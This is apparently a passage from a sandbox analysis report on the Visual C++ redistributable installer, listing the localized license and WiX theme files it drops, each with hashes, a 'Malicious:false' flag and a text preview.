                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1040\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11440
                                                                        Entropy (8bit):5.037988271709582
                                                                        Encrypted:false
                                                                        SSDEEP:192:HJdZDQX6UXR2+5AkgS/PhdzerS8QGowHV66zdgkycjGCDLQ+n3YJ258FSiej4LaW:7azAUd+RrR5jjPLQY3YJTSjk42
                                                                        MD5:BC58AD6ABB16B982AEBADC121B37E706
                                                                        SHA1:25E3E4127A643DB5DB2A0B62B02DE871359FAE42
                                                                        SHA-256:70ECF23C03B66A2B18E173332586AFA8F00F91E02A80628F4F9CB2521E27F6AC
                                                                        SHA-512:8340452CB5E196CB1D5DA6DBB3FA8872E519D7903A05331055370B4850D912674F0B6AF3D6E4F94248FE8135EB378EB36969821D711FE1624A04AF13BBE55D70
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT\par..RUNTIME MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario. Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, tranne se accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1040\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1041\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):30228
                                                                        Entropy (8bit):3.785116198512527
                                                                        Encrypted:false
                                                                        SSDEEP:192:I6ZzmL3hCm2AivEiTsk3H1DjM3Lm4nVsO4Uy9C0QueLJkEBN7VvfNSqkO+0TU7B9:VArCQx/2LLW7//72
                                                                        MD5:47C315C54B6F2078875119FA7A718499
                                                                        SHA1:F650DDB5DF2AF2EE7555C410D034B37B9DFD055B
                                                                        SHA-256:C3061A334BFD5F02B7085F8F454D5D3D97D477AF14BAB497BF31A7887BC90C5B
                                                                        SHA-512:A0E4B0FCCCFDD93BAF133C2080403E8719E4A6984237F751BD883C0D3C52D818EFD00F8BA7726A2F645F66286305599403470F14D39EEDC526DDE59228A5F261
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS PGothic;}{\f1\fnil\fcharset0 Tahoma;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\f1 \f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\f1 \f0\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\f1\par..MICROSOFT VISUAL C++ 2015 - 2022 \f0\'83\'89\'83\'93\'83\'5e\'83\'43\'83\'80\f1\par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation\f2\'a3\'a8\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'bd\'8a\'d6\'98\'41\'89\'ef\'8e\'d0\f2\'a3\'a9\f0\'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\f2\'a1\'a3\'b

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1041\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1042\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28393
                                                                        Entropy (8bit):3.874126830110936
                                                                        Encrypted:false
                                                                        SSDEEP:384:CuQibAmua4XatV1pMxlD1xzjxsZmfmzw4ezN7RQjyeqCBS96My7yNRylDSFrQv90:n4atZClDFsZuheqooMerJlQq/
                                                                        MD5:641D926354F001034CF3F2F3B0FF33DC
                                                                        SHA1:5505107FFF6CF279769A82510276F61EA18637AE
                                                                        SHA-256:3D4E9C165CBEAB829D608106F0E96450F839FFA8ADBD755F0B51867E89DA2AE0
                                                                        SHA-512:B0339664434B096ABC26D600F7657919EF3689B4E0FDFD4EDD8E479859A51EF51BE8F05FA43E25567FFD6C1C2BCC6EF0D7A857B6D666D264C7783BAD3A383D0E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'b7\'b1\'c5\'b8\'c0\'d3\f0 \par..\b0\f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'b6\'f3\'c0\'cc\'bc\'b1\'bd\'ba\f0 \f1\'

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1042\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1045\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13352
                                                                        Entropy (8bit):5.359561719031494
                                                                        Encrypted:false
                                                                        SSDEEP:384:Pd0SEvKJ7P9yEw1VAOV/sHm/Iznc2wf6w2:8Jf/sHmAzcaX
                                                                        MD5:F140FD8CA2C63A861D04310257C1B1DB
                                                                        SHA1:7BF7EF763A1F80ECACA692908F8F0790A88C3CA1
                                                                        SHA-256:6F94A99072061012C5626A6DD069809EC841D6E3102B48394D522A0C2E3AA2B5
                                                                        SHA-512:A0BD65AF13CC11E41E5021DF0399E5D21B340EF6C9BBE9B1B56A1766F609CEB031F550A7A0439264B10D67A76A6403E41ABA49B3C9E347CAEDFE9AF0C5BE1EE6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA MICROSOFT\par..\f0 MICROSOFT VISUAL C++ \f1\'8cRODOWISKO URUCHOMIENIOWE 2015-2022 \par..\b0\f0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a Licencjobiorc\f1\'b9. Postanowienia te dotycz\'b9 oprogramowania okre\'9clonego powy\'bfej. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym tow

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1045\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1046\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10956
                                                                        Entropy (8bit):5.086757849952268
                                                                        Encrypted:false
                                                                        SSDEEP:192:H2JR4ufWXXFA+YGRjHquAHHoKWCsGlHIpSDDvJRkYhaDznP3l7wLXiBpt32:WJ6ufB+Yc3AnoZCb5AGPQPCLQ72
                                                                        MD5:9A8D2ACF07F3C01E5CBC461AB932D85B
                                                                        SHA1:8781A298DCC14C18C6F6DB58B64F50B2FC6E338E
                                                                        SHA-256:27891EEC899BE859E3B4D3B29247FC6B535D7E836DEF0329111C48741EC6E701
                                                                        SHA-512:A60262A0C18E3BEF7C6D52F242153EBE891F676ED639F2DACFEBBAC86E70EEBF58AA95A7FE1A16E15A553C1BD3ECACCD8677EB9D2761CB79CB9A342C9B4252E2
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..TEMPO DE EXECU\'c7\'c3O DO MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Os presentes termos de licen\'e7a constituem um contrato firmado entre a Microsoft Corporation (ou, dependendo do local no qual voc\'ea esteja domiciliado, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pn

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1046\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1049\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31981
                                                                        Entropy (8bit):3.6408688850128446
                                                                        Encrypted:false
                                                                        SSDEEP:384:GdkM1I1EqW6aAHmxiTJrN6feZ78C7e5zoPqp007FsrmPx/1JRbnS0Yk4SYdIDtx2:Su4Mtg1S0YkjYWZM
                                                                        MD5:62229BE4447C349DF353C5D56372D64B
                                                                        SHA1:989799ED24913A0E6AE2546EE2A9A8D556E1CB3B
                                                                        SHA-256:1BB3FB55B8A13FA3BAFFFE72F5B1ED8B57A63BD4D8654BB6DC5B9011CE803B44
                                                                        SHA-512:FA366328C3FD4F683FDB1C5A64F5D554DE79620331086E8B4CCC2BFC2595B1FDED02CEC8AA982FCD8B13CC175D222AF2D7E2CD1A33B52F36AFD692B533FDBF13
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Tahoma;}{\f3\fnil\fcharset204 Garamond;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\'d1\'d0\'c5\'c4\'c0 \'c2\'db\'cf\'ce\'cb\'cd\'c5\'cd\'c8\'df MICROSOFT VISUAL C++ 2015\f1\endash\f2 2022 \par..\b0\f0\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1049\thm.wxl

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....

                                                                        C:\Users\user\AppData\Local\Temp\{9B8C7EDA-2539-42FC-9E66-AE939366FE45}\.ba\1055\license.rtf

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13807
                                                                        Entropy (8bit):5.2077828423114045
                                                                        Encrypted:false
                                                                        SSDEEP:192:mfGSPTe1VWjPqkdUxtptACpt4jSzUQBtB7+fzCCnebZ/42W2TEAQjE4oOwuxqrEs:7SK+W6UbACp2SzD9+btebZwZWEdpow2
                                                                        MD5:9625F3A496DBF5E3E0D2F33D417EDBBF
                                                                        SHA1:119376730428812A31B70D58C873866D5307A775
